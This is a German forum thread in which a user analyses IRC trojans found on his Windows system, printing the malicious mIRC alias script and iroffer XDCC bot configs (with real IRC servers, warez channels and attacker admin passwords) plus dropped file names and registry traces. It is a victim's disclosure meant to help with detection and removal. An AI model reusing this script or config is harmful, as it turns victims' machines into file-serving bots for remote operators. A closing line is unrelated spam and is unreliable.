Jo, gerne, jeder Zeit! Man lernt ja gerne dazu [img]smile.gif[/img]

Du könntest alternativ (sofern noch vorhanden) auch mal die betreffenden Dateien an meine E-Mail-Adresse schicken (steht im Profil), dann kann ich selber mal schauen. Außerdem würde der Kandidat noch in meiner Sammlung fehlen. Wäre jedenfalls nett von Dir [img]smile.gif[/img] .

Gruß,
Cassandra

Die Dateien habe ich noch ich schicke dir die Interesantessten mal rüber
Die Standardsachen wie den getarnten VNC clienten lasse ich dabei mal weg

hier noch ein kleiner auszug davon wie so nen script ausehen kann

Mybot2 Datei sieht so aus mit den dazugehörigen angaben zum channel und sen pass des angreifers so wie seinen usernamen

xdccfile mybot2.xdcc
pidfile mybot2.pid
logstats no
logrotate none
ignorefile mybot2.ignl
connectionmethod direct
server 213.77.3.205 6667
channel #XDCC-SHAKEL -plist 5
user_nick [Xdcc][a2]072727o
user_realname 8,14-=[Baa]=- Xdcc
user_modes +i
virthost no
vhost_ip virtip.domain.com
firewall no
dccrangestart 4000
loginname Loads2
slotsmax 5
queuesize 5
slotsmaxpack 5
slotsmaxslots 5
slotsmaxqueue 20
maxtransfersperperson 2
maxqueueditemsperperson 2
filedir /winnt/system32/download
restrictlist yes
restrictsend yes
overallminspeed
transfermaxspeed
overallmaxspeed 0
overallmaxspeeddayspeed 0
overallmaxspeeddaytime 0
overallmaxspeeddaydays MTWRF
debug no
autosend no
autoword blah
automsg blah
autopack 1
xdccautosavetime 30
creditline 1Brought To You By 4Loads1.
adminpass ROmazt.MMB89s
adminhost *@*
adminhost *@*
uploadallowed yes
uploaddir /WINNT/system32/download
uploadmaxsize 1900

Als nächstes das Aliasses script auch ganz interesannt

[aliases]
n0=CreateBot {
n1= //run $mircdir\kill.exe iroffer.exe
n2= /set %xdcc.nick [Wz][IB]xdcc $+ $rand(10,100000)
n3= /timer 1 2 /CreateBot2
n4=}
n5=CreateBot2 {
n6= /remove c:\winnt\system32\mybot.txt
n7= /write c:\winnt\system32\mybot.txt xdccfile mybot.xdcc
n8= /write c:\winnt\system32\mybot.txt pidfile mybot.pid
n9= /write c:\winnt\system32\mybot.txt logstats no
n10= /write c:\winnt\system32\mybot.txt logrotate none
n11= /write c:\winnt\system32\mybot.txt ignorefile mybot.ignl
n12= /write c:\winnt\system32\mybot.txt connectionmethod direct
n13= /write c:\winnt\system32\mybot.txt server 192.114.144.67 9898
n14= /write c:\winnt\system32\mybot.txt channel #warezone -plist 5
n15= /write c:\winnt\system32\mybot.txt channel #ICQ^BOY -plist 5
n16= /write c:\winnt\system32\mybot.txt user_nick %xdcc.nick
n17= /write c:\winnt\system32\mybot.txt user_realname 9,14-=[ICQ^BOY's]=- Xdcc
n18= /write c:\winnt\system32\mybot.txt user_modes +i
n19= /write c:\winnt\system32\mybot.txt virthost no
n20= /write c:\winnt\system32\mybot.txt vhost_ip virtip.domain.com
n21= /write c:\winnt\system32\mybot.txt firewall no
n22= /write c:\winnt\system32\mybot.txt dccrangestart 4000
n23= /write c:\winnt\system32\mybot.txt loginname W-M
n24= /write c:\winnt\system32\mybot.txt slotsmax 5
n25= /write c:\winnt\system32\mybot.txt queuesize 5
n26= /write c:\winnt\system32\mybot.txt slotsmaxpack 5
n27= /write c:\winnt\system32\mybot.txt slotsmaxslots 5
n28= /write c:\winnt\system32\mybot.txt slotsmaxqueue 20
n29= /write c:\winnt\system32\mybot.txt maxtransfersperperson 2
n30= /write c:\winnt\system32\mybot.txt maxqueueditemsperperson 2
n31= /write c:\winnt\system32\mybot.txt filedir /winnt/system32/download
n32= /write c:\winnt\system32\mybot.txt restrictlist yes
n33= /write c:\winnt\system32\mybot.txt restrictsend yes
n34= /write c:\winnt\system32\mybot.txt overallminspeed
n35= /write c:\winnt\system32\mybot.txt transfermaxspeed
n36= /write c:\winnt\system32\mybot.txt overallmaxspeed 0
n37= /write c:\winnt\system32\mybot.txt overallmaxspeeddayspeed 0
n38= /write c:\winnt\system32\mybot.txt overallmaxspeeddaytime 0
n39= /write c:\winnt\system32\mybot.txt overallmaxspeeddaydays MTWRF
n40= /write c:\winnt\system32\mybot.txt debug no
n41= /write c:\winnt\system32\mybot.txt autosend no
n42= /write c:\winnt\system32\mybot.txt autoword blah
n43= /write c:\winnt\system32\mybot.txt automsg blah
n44= /write c:\winnt\system32\mybot.txt autopack 1
n45= /write c:\winnt\system32\mybot.txt xdccautosavetime 30
n46= /write c:\winnt\system32\mybot.txt creditline 1Brought To You By 12ICQ^BOY1.
n47= /write c:\winnt\system32\mybot.txt adminpass C20I8z76CaUCo
n48= /write c:\winnt\system32\mybot.txt adminhost ICQ^BOY*!*@*
n49= /write c:\winnt\system32\mybot.txt uploadallowed yes
n50= /write c:\winnt\system32\mybot.txt uploaddir /WINNT/system32/download
n51= /write c:\winnt\system32\mybot.txt uploadmaxsize 1900
n52= /timer 1 2 //run $mircdir\iroffer.exe mybot.txt
n53=}
n54=CreateBota {
n55= //run $mircdir\kill.exe iroffer.exe
n56= /set %xdcc.nick2 [Wz][IB]xdcc $+ $rand(10,100000)
n57= /timer 1 2 /CreateBota2
n58=}
n59=CreateBota2 {
n60= /remove c:\winnt\system32\mybot2.txt
n61= /write c:\winnt\system32\mybot2.txt xdccfile mybot2.xdcc
n62= /write c:\winnt\system32\mybot2.txt pidfile mybot2.pid
n63= /write c:\winnt\system32\mybot2.txt logstats no
n64= /write c:\winnt\system32\mybot2.txt logrotate none
n65= /write c:\winnt\system32\mybot2.txt ignorefile mybot2.ignl
n66= /write c:\winnt\system32\mybot2.txt connectionmethod direct
n67= /write c:\winnt\system32\mybot2.txt server mission.irc.co.il 6667
n68= /write c:\winnt\system32\mybot2.txt channel #ICQ^BOY -plist 5
n69= /write c:\winnt\system32\mybot2.txt channel #Warezone -plist 5
n70= /write c:\winnt\system32\mybot2.txt user_nick %xdcc.nick2
n71= /write c:\winnt\system32\mybot2.txt user_realname 9,14-=[ICQ^BOY's]=- Xdcc
n72= /write c:\winnt\system32\mybot2.txt user_modes +i
n73= /write c:\winnt\system32\mybot2.txt virthost no
n74= /write c:\winnt\system32\mybot2.txt vhost_ip virtip.domain.com
n75= /write c:\winnt\system32\mybot2.txt firewall no
n76= /write c:\winnt\system32\mybot2.txt dccrangestart 4000
n77= /write c:\winnt\system32\mybot2.txt loginname w-m
n78= /write c:\winnt\system32\mybot2.txt slotsmax 5
n79= /write c:\winnt\system32\mybot2.txt queuesize 5
n80= /write c:\winnt\system32\mybot2.txt slotsmaxpack 5
n81= /write c:\winnt\system32\mybot2.txt slotsmaxslots 5
n82= /write c:\winnt\system32\mybot2.txt slotsmaxqueue 20
n83= /write c:\winnt\system32\mybot2.txt maxtransfersperperson 2
n84= /write c:\winnt\system32\mybot2.txt maxqueueditemsperperson 2
n85= /write c:\winnt\system32\mybot2.txt filedir /winnt/system32/download
n86= /write c:\winnt\system32\mybot2.txt restrictlist yes
n87= /write c:\winnt\system32\mybot2.txt restrictsend yes
n88= /write c:\winnt\system32\mybot2.txt overallminspeed
n89= /write c:\winnt\system32\mybot2.txt transfermaxspeed
n90= /write c:\winnt\system32\mybot2.txt overallmaxspeed 0
n91= /write c:\winnt\system32\mybot2.txt overallmaxspeeddayspeed 0
n92= /write c:\winnt\system32\mybot2.txt overallmaxspeeddaytime 0
n93= /write c:\winnt\system32\mybot2.txt overallmaxspeeddaydays MTWRF
n94= /write c:\winnt\system32\mybot2.txt debug no
n95= /write c:\winnt\system32\mybot2.txt autosend no
n96= /write c:\winnt\system32\mybot2.txt autoword blah
n97= /write c:\winnt\system32\mybot2.txt automsg blah
n98= /write c:\winnt\system32\mybot2.txt autopack 1
n99= /write c:\winnt\system32\mybot2.txt xdccautosavetime 30
n100= /write c:\winnt\system32\mybot2.txt creditline 1Brought To You By 12ICQ^BOY's1.
n101= /write c:\winnt\system32\mybot2.txt adminpass C20I8z76CaUCo
n102= /write c:\winnt\system32\mybot2.txt adminhost ICQ^BOY*!*@*
n103= /write c:\winnt\system32\mybot2.txt uploadallowed yes
n104= /write c:\winnt\system32\mybot2.txt uploaddir /WINNT/system32/download
n105= /write c:\winnt\system32\mybot2.txt uploadmaxsize 1900
n106= /timer 1 2 //run $mircdir\iroffer.exe mybot2.txt
n107=}

hoffe ein wenig einblich darüber gegeben zu haben was sich hinter solch einen trojaner verbirgt es sind da noch sehr viele dateien vorhanden die dazugehören allerdings würde es den rahmen des Boards Sprengen alle hier aufzulisten

Mfg. AUGUST

So wollte nur mal melden das mein problem nun gelöst ist mit den zahlreichen IRC Trojanern
bedanke mich für eure antworten und Tips

zudem habe ich sehr viel hintergrundwissen über diese Dateien und deren aufbau gewonnen durch persönliche nachforschungen also wer zu IRC trojanern etwas wissen möchte oder deren Funktion und wo sie auf den System zu finden sind kann mir gerne ne PM schicken ich versuche ihn dann zu helfen bei der Entfernung wer sonst noch fragen haben sollte zu den von mir aufgeführten IRC Ptotocollen und was die nun bedeuten kann sich auch gerne melden

Zu einigen Dateien welche ich entdeckt habe existiert im netz noch nichts und man findet auch keine hinweise auf solche auf Antivirenseiten was sich jedoch ändern wird Symantec hate Interesse an den Dateien und wird Sie auch im nächsten Virendefinitionsupdate aufnehmen

ein kleiner auszug für euch worauf ihr achten soltet die bislang unbekannten dateien sind in den ordner

C:\WINNT\System32 zu finden und heissen

Dms.exe
eleet.exe

beide Dateien beinhalten IRC Trojaner also vorsicht bei wenn ihr diese beiden Dateien in euren System verzeichniss finden soltet

Viele nette grüsse und einen guten start in die neue woche wünscht euch AUGUST

so noch mehr erkentnisse dank n_dot_force der mich noch auf eine idee gebracht hat wie bei sub seven legen diese trojaner zb für den vnc server der zuvor als zb. explorer exe getarnt wird noch einige registryeintragungen fest hier habe ich noch ein paar die ich dazu gefunden habe

Wenn Sie diesen Eintrag löschen, werden folgende Schlüssel gelöscht
HKEY_CURRENT_USER\Software\Orl\VNCHooks\Application_Prefs
HKEY_CURRENT_USER\Software\Orl\VNCHooks
HKEY_CURRENT_USER\Software\Orl\WinVNC3
HKEY_LOCAL_MACHINE\Software\Orl\WinVNC3\Default
HKEY_LOCAL_MACHINE\Software\Orl\WinVNC3
HKEY_CURRENT_USER\Software\Orl\VNCHooks\Application_Prefs
HKEY_CURRENT_USER\Software\Orl\VNCHooks

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU\

enthält

000 = Rcfg.ini
001 = Sencs.bat
002 = obcd
003 = albun
004 = Vnc
005 = orl

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU

enthält

000 = albun

Nachtrag
was noch so in der Registry gefunden wurde

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}

000 = PSEXESVC.EXE
001 = winmgmt.exe
002 = wingmt.exe
003 = IR.conf
004 = rb.bat
005 = dwldr32
006 = taskman
007 = svchost32.exe
008 = secure.bat
009 = start.bat
010 = rconnect
011 = explore.dat
012 = bootdrv.dll
013 = activex.ocx
014 = cygwin1.dll
015 = psexec.exe
016 = omnithread_rt.dll
017 = 32dllemu.txt
018 = LSASS.exe
019 = Services.exe
020 = SVhost.exe
021 = Dtceindll32.dll
022 = QoSServer.dll
023 = .dcba

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU

000 = Xdcc

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xdcc
Application NOTEPAD.EXE

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSEXESVC

- Standard
- DisplayName (PSEXESVC)
- ErrorControl ist 1
- ImagePath (%SystemRoot%\System32\PSEXESVC.EXE)
- ObjectName (LocalSystem)
- Start (4)
- Type (10)

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\PSEXESVC

- Standard
- DisplayName (PSEXESVC)
- ErrorControl ist 1
- ImagePath (%SystemRoot%\System32\PSEXESVC.EXE)
- ObjectName (LocalSystem)
- Start (4)
- Type (10)

HKEY_CLASSES_ROOT\AppID\winmgmt.exe

- AppId ( {8BC3F05E-D86B-11D0-A075-00C04FB68820} )

HKEY_CLASSES_ROOT\AppID\WinMgmt

- AppId ({74864DA1-0630-11D0-A5B6-00AA00680C3F} )
-------------------------------------------------------------------------------------------
HKEY_CLASSES_ROOT\CLSID\{74864DA1-0630-11D0-A5B6-00AA00680C3F}

- Standard Microsoft WBEM Server
- AppId {74864DA1-0630-11D0-A5B6-00AA00680C3F}
- LocalService WinMgmt
- ThreadingModel Both

HKEY_CLASSES_ROOT\CLSID\{74864DA1-0630-11D0-A5B6-00AA00680C3F}\LocalServer32

- Standard (C:\WINNT\System32\WBEM\winmgmt.exe)
- ThreadingModel (Both)

--------------------------------------------------------------------------------------------

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{74864DA1-0630-11D0-A5B6-00AA00680C3F}

- Standard winmgmt.exe
- LocalService WinMgmt

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinMgmt

- ImagePath %SystemRoot%\System32\WBEM\WinMgmt.exe
- ObjectName LocalSystem
- Start 2
- Type 10
- Failure Action

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\WinMgmt
- ImagePath %SystemRoot%\System32\WBEM\WinMgmt.exe
- ObjectName LocalSystem
- Start 2
- Type 10
- Failure Action

einiges davon gehört noch zu den Trojaner

Mfg.August

I must admit to being more impressed for it. I've even recommended it to all my friends outlook express messages disappear dbx reader